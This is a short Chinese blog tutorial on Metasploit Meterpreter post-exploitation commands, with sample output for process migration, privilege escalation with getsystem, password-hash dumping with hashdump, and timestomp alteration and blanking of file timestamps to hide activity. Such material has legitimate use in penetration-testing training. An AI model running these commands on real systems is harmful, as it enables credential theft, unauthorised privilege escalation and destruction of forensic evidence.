Metasploit之——高级后渗透模块

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666767

1.迁移到更安全的进程

migrate [要迁移到的进程id]

2.获取系统级权限

getsystem

注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

3.获取密码的哈希值

run hashdump

获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。

4.修改文件的访问时间、修改时间和创建时间

这里用到的命令是timestomp

4-1.查看文件的时间信息

timestomp -v [目标文件]

meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 10:24:42 +0800
Accessed      : 2019-01-25 11:20:58 +0800
Created       : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800

4-2.修改文件的时间信息

timestomp -z [时间信息] [目标文件]

此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS

meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 10:24:42 +0800
Accessed      : 2019-01-25 11:20:58 +0800
Created       : 2019-01-25 10:23:22 +0800
Entry Modified: 2019-01-25 10:24:42 +0800
meterpreter > 
meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt
[*] Setting specific MACE attributes on e:test.txt
meterpreter > timestomp -v e:\test.txt
[*] Showing MACE attributes for e:test.txt
Modified      : 2019-01-25 11:00:00 +0800
Accessed      : 2019-01-25 11:26:29 +0800
Created       : 2019-01-25 11:00:00 +0800
Entry Modified: 2019-01-25 11:00:00 +0800

4-3.清空时间信息

timestomp -b [目标文件]

meterpreter > timestomp -b e:\test.txt
[*] Blanking file MACE attributes on e:test.txt

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值